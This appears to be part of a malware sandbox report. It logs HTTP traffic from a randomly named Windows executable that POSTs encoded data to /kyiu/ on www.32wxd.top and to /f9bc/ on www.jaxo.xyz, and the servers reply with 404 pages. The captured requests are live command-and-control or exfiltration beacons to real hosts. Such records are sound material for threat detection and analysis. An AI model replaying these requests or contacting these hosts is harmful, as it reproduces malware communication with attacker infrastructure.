                                      Data Raw: 33 4c 39 6c 3d 61 42 75 4e 76 38 62 55 44 41 41 7a 47 2f 32 67 4a 79 76 75 67 42 2f 42 65 43 4a 53 2f 6e 5a 2f 37 62 67 51 31 41 61 48 42 30 55 4e 72 39 69 33 58 71 6b 4e 36 6e 47 32 44 6b 5a 73 4a 42 2b 78 38 37 78 56 30 56 31 39 5a 4b 52 4d 79 4d 78 6b 2b 4a 41 73 4b 70 61 51 6f 33 4a 71 68 74 6e 7a 41 78 38 5a 30 62 4e 5a 30 52 32 48 33 68 65 75 48 32 67 6e 52 73 61 7a 48 4e 31 6b 68 39 76 52 4e 54 31 2b 38 4e 35 6a 73 31 46 5a 4f 55 52 37 2b 38 78 4e 56 68 44 48 4a 59 46 78 45 73 6c 6a 41 51 44 66 4a 6d 62 55 4f 39 61 41 6a 67 46 68 49 6e 4e 71 63 65 63 6d 67 71 73 4d 57 56 35 66 52 41 3d 3d
                                      Data Ascii: 3L9l=aBuNv8bUDAAzG/2gJyvugB/BeCJS/nZ/7bgQ1AaHB0UNr9i3XqkN6nG2DkZsJB+x87xV0V19ZKRMyMxk+JAsKpaQo3JqhtnzAx8Z0bNZ0R2H3heuH2gnRsazHN1kh9vRNT1+8N5js1FZOUR7+8xNVhDHJYFxEsljAQDfJmbUO9aAjgFhInNqcecmgqsMWV5fRA==
                                      Aug 26, 2024 18:28:31.993931055 CEST691INHTTP/1.1 404 Not Found
                                      Server: nginx
                                      Date: Mon, 26 Aug 2024 16:28:31 GMT
                                      Content-Type: text/html
                                      Content-Length: 548
                                      Connection: close
                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      14192.168.2.449752206.119.82.116805356C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exe
                                      TimestampBytes transferredDirectionData
                                      Aug 26, 2024 18:28:33.643420935 CEST756OUTPOST /kyiu/ HTTP/1.1
                                      Host: www.32wxd.top
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Language: en-US,en;q=0.5
                                      Accept-Encoding: gzip, deflate
                                      Origin: http://www.32wxd.top
                                      Referer: http://www.32wxd.top/kyiu/
                                      Cache-Control: max-age=0
                                      Connection: close
                                      Content-Length: 221
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                                      Data Raw: 33 4c 39 6c 3d 61 42 75 4e 76 38 62 55 44 41 41 7a 47 63 75 67 4d 52 33 75 31 52 2f 43 53 69 4a 53 30 48 5a 6a 37 62 73 51 31 42 75 58 42 43 38 4e 72 64 79 33 57 76 45 4e 35 6e 47 32 4c 45 5a 70 58 78 2b 41 38 37 38 32 30 55 4a 39 5a 4b 56 4d 79 4f 5a 6b 2f 36 6f 76 4c 35 61 57 30 33 4a 37 6c 74 6e 7a 41 78 38 5a 30 62 59 45 30 52 65 48 32 51 4f 75 56 44 41 6f 53 73 61 77 4e 74 31 6b 6c 39 75 57 4e 54 31 58 38 4d 6b 45 73 77 42 5a 4f 56 68 37 36 35 64 43 66 68 44 4e 58 6f 45 54 44 35 63 30 47 78 32 71 4b 6c 65 32 48 76 6a 69 72 47 55 37 5a 57 73 39 4f 65 34 56 39 74 6c 34 62 57 45 57 4b 49 6e 32 57 32 43 4b 36 33 5a 57 5a 42 32 5a 4e 45 70 6e 34 7a 45 3d
                                      Data Ascii: 3L9l=aBuNv8bUDAAzGcugMR3u1R/CSiJS0HZj7bsQ1BuXBC8Nrdy3WvEN5nG2LEZpXx+A87820UJ9ZKVMyOZk/6ovL5aW03J7ltnzAx8Z0bYE0ReH2QOuVDAoSsawNt1kl9uWNT1X8MkEswBZOVh765dCfhDNXoETD5c0Gx2qKle2HvjirGU7ZWs9Oe4V9tl4bWEWKIn2W2CK63ZWZB2ZNEpn4zE=
                                      Aug 26, 2024 18:28:34.542093039 CEST691INHTTP/1.1 404 Not Found
                                      Server: nginx
                                      Date: Mon, 26 Aug 2024 16:28:34 GMT
                                      Content-Type: text/html
                                      Content-Length: 548
                                      Connection: close
                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      15192.168.2.449753206.119.82.116805356C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exe
                                      TimestampBytes transferredDirectionData
                                      Aug 26, 2024 18:28:36.195352077 CEST10838OUTPOST /kyiu/ HTTP/1.1
                                      Host: www.32wxd.top
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Language: en-US,en;q=0.5
                                      Accept-Encoding: gzip, deflate
                                      Origin: http://www.32wxd.top
                                      Referer: http://www.32wxd.top/kyiu/
                                      Cache-Control: max-age=0
                                      Connection: close
                                      Content-Length: 10301
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                                      Data Raw: 33 4c 39 6c 3d 61 42 75 4e 76 38 62 55 44 41 41 7a 47 63 75 67 4d 52 33 75 31 52 2f 43 53 69 4a 53 30 48 5a 6a 37 62 73 51 31 42 75 58 42 43 45 4e 72 4f 71 33 58 4f 45 4e 34 6e 47 32 49 45 5a 6f 58 78 2b 5a 38 37 6b 71 30 55 46 4c 5a 4a 39 4d 77 74 68 6b 34 4c 6f 76 46 35 61 57 2f 58 4a 72 68 74 6e 69 41 78 73 6a 30 62 49 45 30 52 65 48 32 53 6d 75 43 47 67 6f 55 73 61 7a 48 4e 31 67 68 39 76 78 4e 53 64 74 38 4d 67 2b 76 45 31 5a 4f 31 78 37 38 66 4a 43 5a 78 44 44 57 6f 45 31 44 35 5a 7a 47 78 72 56 4b 6d 44 62 48 73 2f 69 75 54 56 34 44 53 78 6a 66 4e 4d 66 71 38 55 65 55 55 38 42 4c 70 2b 4c 54 44 69 47 73 58 64 44 65 6a 58 56 57 77 56 50 71 31 49 6f 52 4e 64 4c 64 70 67 5a 6c 78 6f 68 2f 62 6f 39 6f 45 68 37 69 6c 34 78 53 63 34 56 42 79 43 73 59 38 59 7a 51 45 77 6b 74 37 33 5a 67 67 74 73 76 50 6f 50 62 2b 42 4c 62 56 57 52 33 4e 36 49 61 56 41 33 6c 67 49 79 4d 77 42 2f 78 67 47 4b 35 57 35 36 65 4a 62 37 43 59 37 76 62 52 6a 6c 63 69 36 4f 2b 75 4b 45 57 61 4e 61 65 4f 44 69 7a 51 62 53 68 [TRUNCATED]
                                      Data Ascii: 3L9l=aBuNv8bUDAAzGcugMR3u1R/CSiJS0HZj7bsQ1BuXBCENrOq3XOEN4nG2IEZoXx+Z87kq0UFLZJ9Mwthk4LovF5aW/XJrhtniAxsj0bIE0ReH2SmuCGgoUsazHN1gh9vxNSdt8Mg+vE1ZO1x78fJCZxDDWoE1D5ZzGxrVKmDbHs/iuTV4DSxjfNMfq8UeUU8BLp+LTDiGsXdDejXVWwVPq1IoRNdLdpgZlxoh/bo9oEh7il4xSc4VByCsY8YzQEwkt73ZggtsvPoPb+BLbVWR3N6IaVA3lgIyMwB/xgGK5W56eJb7CY7vbRjlci6O+uKEWaNaeODizQbShDOCDubglgRrvSwEstlNwIrNRbC0cLNd64biJcUli/MGMxnB/m/9zvvfCnBt1JCLZLJiBiuUlm0SyeT9g3RzGPP0XlOSewKAyqoAMSgMSTAEGc+e3evdFN3nFzwNhttV21Dw1loHj7Ari1LZL5QUzej9V9tk9rEismE+1CBDKxiOdJWmwEUXqNxwKvoi5OEjTnWNxdIoAceb3d3M5c3Xvgy/4ML26rLCqFYWpVlDYTmDrGP+vzMnv4BtRQ9TWLmXLOFbT52QVbGytoXTpfLSx9aLjAP7eyLgKvQnRpMMaw1VYErUApqFVfyv8MSKD3qGsNEqKaUEJgoVHPoEAvyZKH4kv5ktjBKrBimecJoC4suV1sABxQUOK2zO7Fs1Hj4OaEimmtmY0Nqxk2M6mEfiprsm/NuewmYtxP4wNXqohIX6KFmOweJ5JDii0//l8lf9X7WqkJMkszu0hmHqZx14af7yKS0+I6cj79MBkODD+09mVqfPkClyrztKCILEDfxN7Sk3Z4UIl5PWcP2R922lhgwsrsqMsXmDUGP0sJTkAJdoUu/wBuCGNzRGqV1OZSBonwKVgS1Q3nGN7YxPV6AvI3/G/78oKoOrUuZubSS2gQ6R2428B3PscYugREvV+hugjMeGiZy5a3QxVgNBMyvaY3099OqCrK/eG1h [TRUNCATED]
                                      Aug 26, 2024 18:28:37.068296909 CEST691INHTTP/1.1 404 Not Found
                                      Server: nginx
                                      Date: Mon, 26 Aug 2024 16:28:36 GMT
                                      Content-Type: text/html
                                      Content-Length: 548
                                      Connection: close
                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      16192.168.2.449754206.119.82.116805356C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exe
                                      TimestampBytes transferredDirectionData
                                      Aug 26, 2024 18:28:38.734759092 CEST479OUTGET /kyiu/?kZr0=ht-lElyh&3L9l=XDGtsL25HTw6JP67Ly7M1BrbeTxg63xVn4NdqHGWC1gt1eOjH+BVmk6PIm5PWw2c27Ak8m93WqRL2MBomZszGMKw0lI8qqbvBzBP6NUCsyvYxAKvE0l8E9k= HTTP/1.1
                                      Host: www.32wxd.top
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Language: en-US,en;q=0.5
                                      Connection: close
                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                                      Aug 26, 2024 18:28:39.659877062 CEST691INHTTP/1.1 404 Not Found
                                      Server: nginx
                                      Date: Mon, 26 Aug 2024 16:28:39 GMT
                                      Content-Type: text/html
                                      Content-Length: 548
                                      Connection: close
                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      17192.168.2.44975566.29.149.180805356C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exe
                                      TimestampBytes transferredDirectionData
                                      Aug 26, 2024 18:28:44.727783918 CEST733OUTPOST /f9bc/ HTTP/1.1
                                      Host: www.jaxo.xyz
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Language: en-US,en;q=0.5
                                      Accept-Encoding: gzip, deflate
                                      Origin: http://www.jaxo.xyz
                                      Referer: http://www.jaxo.xyz/f9bc/
                                      Cache-Control: max-age=0
                                      Connection: close
                                      Content-Length: 201
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                                      Data Raw: 33 4c 39 6c 3d 33 51 6a 6d 58 72 34 64 41 72 65 45 51 4b 51 57 34 33 4a 50 6a 74 63 65 6b 54 6c 65 6a 61 56 32 31 61 5a 38 68 46 7a 6f 33 41 73 74 6e 53 76 43 6f 43 32 41 72 79 65 55 45 77 78 70 2f 50 55 75 63 54 45 6c 4e 68 57 62 65 69 77 6c 31 2f 6f 56 79 4c 64 32 4a 35 2b 6e 7a 77 39 36 64 70 50 6e 47 64 76 58 54 36 35 42 51 30 6d 50 50 33 65 38 44 63 79 4b 70 6a 6f 32 44 46 37 79 52 4b 2b 56 48 46 4c 70 41 37 34 61 6d 66 67 59 35 50 34 38 78 42 7a 50 62 63 7a 49 4c 34 58 63 43 7a 74 56 72 46 67 46 64 48 33 57 53 48 46 4c 6d 66 5a 69 65 46 71 6e 59 77 69 67 30 51 58 37 37 69 70 54 7a 77 3d 3d
                                      Data Ascii: 3L9l=3QjmXr4dAreEQKQW43JPjtcekTlejaV21aZ8hFzo3AstnSvCoC2AryeUEwxp/PUucTElNhWbeiwl1/oVyLd2J5+nzw96dpPnGdvXT65BQ0mPP3e8DcyKpjo2DF7yRK+VHFLpA74amfgY5P48xBzPbczIL4XcCztVrFgFdH3WSHFLmfZieFqnYwig0QX77ipTzw==
                                      Aug 26, 2024 18:28:45.337285042 CEST1236INHTTP/1.1 404 Not Found
                                      Date: Mon, 26 Aug 2024 16:28:45 GMT
                                      Server: Apache
                                      Content-Length: 13840
                                      Connection: close
                                      Content-Type: text/html
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 2e 66 75 6e 64 6f 7b 0a 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 63 61 6c 65 73 20 33 73 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 62 61 69 78 6f 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 31 34 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 31 2c 2e 34 39 2c 2e 34 31 2c 2e 39 37 29 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 63 69 6d 61 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 37 73 20 31 [TRUNCATED]
                                      Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <style>.fundo{ animation: scales 3s alternate infinite; transform-origin: center;}.pao-baixo{ animation: rotatepao 14s cubic-bezier(.1,.49,.41,.97) infinite; transform-origin: center;}.pao-cima{ animation: rotatepao 7s 1s cubic-bezier(.1,.49,.41,.97) infinite; transform-origin: center;}.olhos{animation: olhos 2s alternate infinite; transform-origin: center;}.left-sparks{animation: left-sparks 4s alternate infinite; transform-origin: 150px 156px;}.right-sparks{animation: left-sparks 4s alternate infinite; transform-origin: 310px 150px;}.olhos{animation: olhos 2s alternate infinite; transform-origin: center;}@keyframes scales{ from { transform: scale(0.98)} to{ transform: scale(1)}}@keyframes rotatepao{ 0% { transform: rotate(0deg)} 50% , 60%{ transform: rotate(-20deg)} 100%{ transform: rotate(0deg) } }@keyframes [TRUNCATED]
                                      Aug 26, 2024 18:28:45.337372065 CEST1236INData Raw: 28 33 30 64 65 67 29 3b 0a 20 20 7d 0a 7d 0a 0a 40 6b 65 79 66 72 61 6d 65 73 20 6c 65 66 74 2d 73 70 61 72 6b 73 7b 0a 20 20 30 25 7b 0a 20 20 20 20 6f 70 61 63 69 74 79 3a 20 30 3b 20 0a 20 20 7d 0a 20 20 0a 7d 0a 0a 0a 2e 6d 61 69 6e 7b 0a 20
                                      Data Ascii: (30deg); }}@keyframes left-sparks{ 0%{ opacity: 0; } }.main{ min-height: 600px; margin: 0px auto; width: auto; max-width: 460px; display: flex; align-items: center; justify-content: center;}.path { str
                                      Aug 26, 2024 18:28:45.337385893 CEST448INData Raw: 37 37 34 2d 35 2e 34 33 20 31 2e 34 38 33 2d 31 30 2e 37 36 37 20 33 2e 38 30 38 2d 31 36 2e 33 36 39 20 33 2e 38 34 38 2d 35 2e 36 30 31 2e 30 33 38 2d 31 31 2e 37 36 33 2d 33 2d 31 33 2e 33 38 36 2d 38 2e 38 30 38 2d 31 2e 37 30 37 2d 36 2e 31
                                      Data Ascii: 774-5.43 1.483-10.767 3.808-16.369 3.848-5.601.038-11.763-3-13.386-8.808-1.707-6.107 2.182-12.41 6.642-16.577 9.072-8.474 21.203-12.707 29.441-22.126 7.927-9.063 11.264-22.574 8.574-34.716-2.692-12.141-11.326-22.538-22.188-26.715-27.683-10.645
                                      Aug 26, 2024 18:28:45.337455988 CEST1236INData Raw: 34 2d 35 35 2e 35 34 32 20 31 39 2e 38 38 34 2d 31 31 32 2e 31 35 37 20 33 36 2e 34 39 2d 31 36 37 2e 38 34 39 20 35 35 2e 39 36 33 2d 32 30 2e 38 31 20 37 2e 32 37 35 2d 34 34 2e 39 31 20 31 38 2e 36 30 36 2d 34 38 2e 37 36 36 20 34 31 2e 39 32
                                      Data Ascii: 4-55.542 19.884-112.157 36.49-167.849 55.963-20.81 7.275-44.91 18.606-48.766 41.922z"/> </defs> <g fill="none" fill-rule="evenodd"> <path fill="#FFF" d="M0 0H1366V800H0z" transform="translate(-448 -157)"/> <g transform=
                                      Aug 26, 2024 18:28:45.337469101 CEST1236INData Raw: 30 37 2d 33 2e 31 39 36 20 32 2e 35 35 38 2d 33 34 2e 38 30 35 20 32 33 2e 35 32 36 2d 39 39 2e 35 34 20 31 32 2e 33 37 39 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 36 31 20 36 38 29 22 2f 3e 0a 20 20 20 20 20 20 20
                                      Data Ascii: 07-3.196 2.558-34.805 23.526-99.54 12.379" transform="translate(161 68)"/> <path fill="#FFDA7F" d="M5.679 131.837c-6.522 1.646-.275 6.91 9.492 12.14 9.767 5.229 28.24 10.257 44.267 10.015 16.028-.243 37.48-.481 52.543-5.333 15.
                                      Aug 26, 2024 18:28:45.337483883 CEST448INData Raw: 31 2e 34 34 36 2e 36 31 2d 31 2e 37 37 34 20 31 2e 30 39 38 2d 2e 31 36 38 2e 32 34 38 2d 2e 33 2e 35 31 32 2d 2e 33 31 37 2e 37 39 32 2d 2e 30 31 37 2e 33 31 33 2e 31 35 34 2e 35 30 33 2e 32 39 2e 37 37 36 2e 32 34 39 2e 34 39 34 20 31 2e 32 34
                                      Data Ascii: 1.446.61-1.774 1.098-.168.248-.3.512-.317.792-.017.313.154.503.29.776.249.494 1.245.392 1.22-.162-.014-.274.33-.612.54-.817.367-.361.75-.62.923-1.075.154-.404-.413-.7-.882-.612M51.621 9.247c-.182-.409-.68-.325-.615.364.063.687.007 1.485.25 2.0
                                      Aug 26, 2024 18:28:45.337723970 CEST1236INData Raw: 33 2d 2e 36 32 33 4d 32 39 2e 37 39 33 20 39 2e 30 31 32 63 2d 2e 32 36 2d 2e 31 30 38 2d 2e 34 39 38 2e 35 33 32 2d 2e 36 32 2e 39 34 32 2d 2e 31 36 36 2e 35 36 35 2d 2e 32 30 35 20 31 2e 30 33 33 2d 2e 31 34 39 20 31 2e 36 37 34 2e 30 35 33 2e
                                      Data Ascii: 3-.623M29.793 9.012c-.26-.108-.498.532-.62.942-.166.565-.205 1.033-.149 1.674.053.59.424.405.493-.048-.002.014.102-.302.138-.4.093-.247.18-.497.262-.76.113-.359.144-1.297-.124-1.408M38.384 6.056c-.737-.211-1.406.211-1.881.674-.53.514-.607 1.19
                                      Aug 26, 2024 18:28:45.337749958 CEST224INData Raw: 20 31 2e 38 34 38 2e 35 30 33 2e 34 39 2e 30 36 39 20 31 2e 30 34 32 2d 2e 31 39 39 2e 38 33 35 2d 2e 34 32 4d 37 33 2e 39 35 36 20 31 30 2e 36 32 36 63 2d 2e 32 33 31 2d 2e 38 33 36 2d 2e 37 33 35 2d 31 2e 32 35 35 2d 31 2e 33 31 36 2d 31 2e 35
                                      Data Ascii: 1.848.503.49.069 1.042-.199.835-.42M73.956 10.626c-.231-.836-.735-1.255-1.316-1.507-.24-.104-.5-.147-.75-.1-.148.028-.273.063-.407.161-.032.022-.373.238-.223.161-.282.148-.382.791-.057.979.117.067.22.24.333.325.168.128.336.
                                      Aug 26, 2024 18:28:45.337762117 CEST1236INData Raw: 32 34 37 2e 35 30 38 2e 33 36 34 2e 33 32 37 2e 32 31 39 2e 35 36 34 2e 36 30 39 2e 38 37 33 2e 38 36 38 2e 35 33 37 2e 34 35 20 31 2e 32 37 2d 2e 34 32 20 31 2e 30 34 2d 31 2e 32 35 31 4d 36 36 2e 35 34 39 20 31 35 2e 30 31 37 63 2d 2e 38 33 2d
                                      Data Ascii: 247.508.364.327.219.564.609.873.868.537.45 1.27-.42 1.04-1.251M66.549 15.017c-.83-.233-.486 2.056-.435 2.528.055.51.678.664.741.08.068-.628.42-2.405-.306-2.608M54.803 16.301c-.065-.347-.1-.709-.19-1.038-.107-.393-.44-.32-.532.052-.186.746-.052
                                      Aug 26, 2024 18:28:45.337826014 CEST224INData Raw: 31 2e 30 33 33 2e 37 32 34 2d 2e 33 35 36 2e 33 38 38 2e 30 37 20 31 2e 31 34 33 2e 35 34 2e 39 33 6c 2d 2e 30 36 35 2d 2e 30 38 33 63 2e 30 39 35 2e 30 35 2e 31 39 32 2e 30 38 2e 32 39 35 2e 30 39 2e 31 37 37 2e 30 33 32 2e 33 31 2e 30 37 34 2e
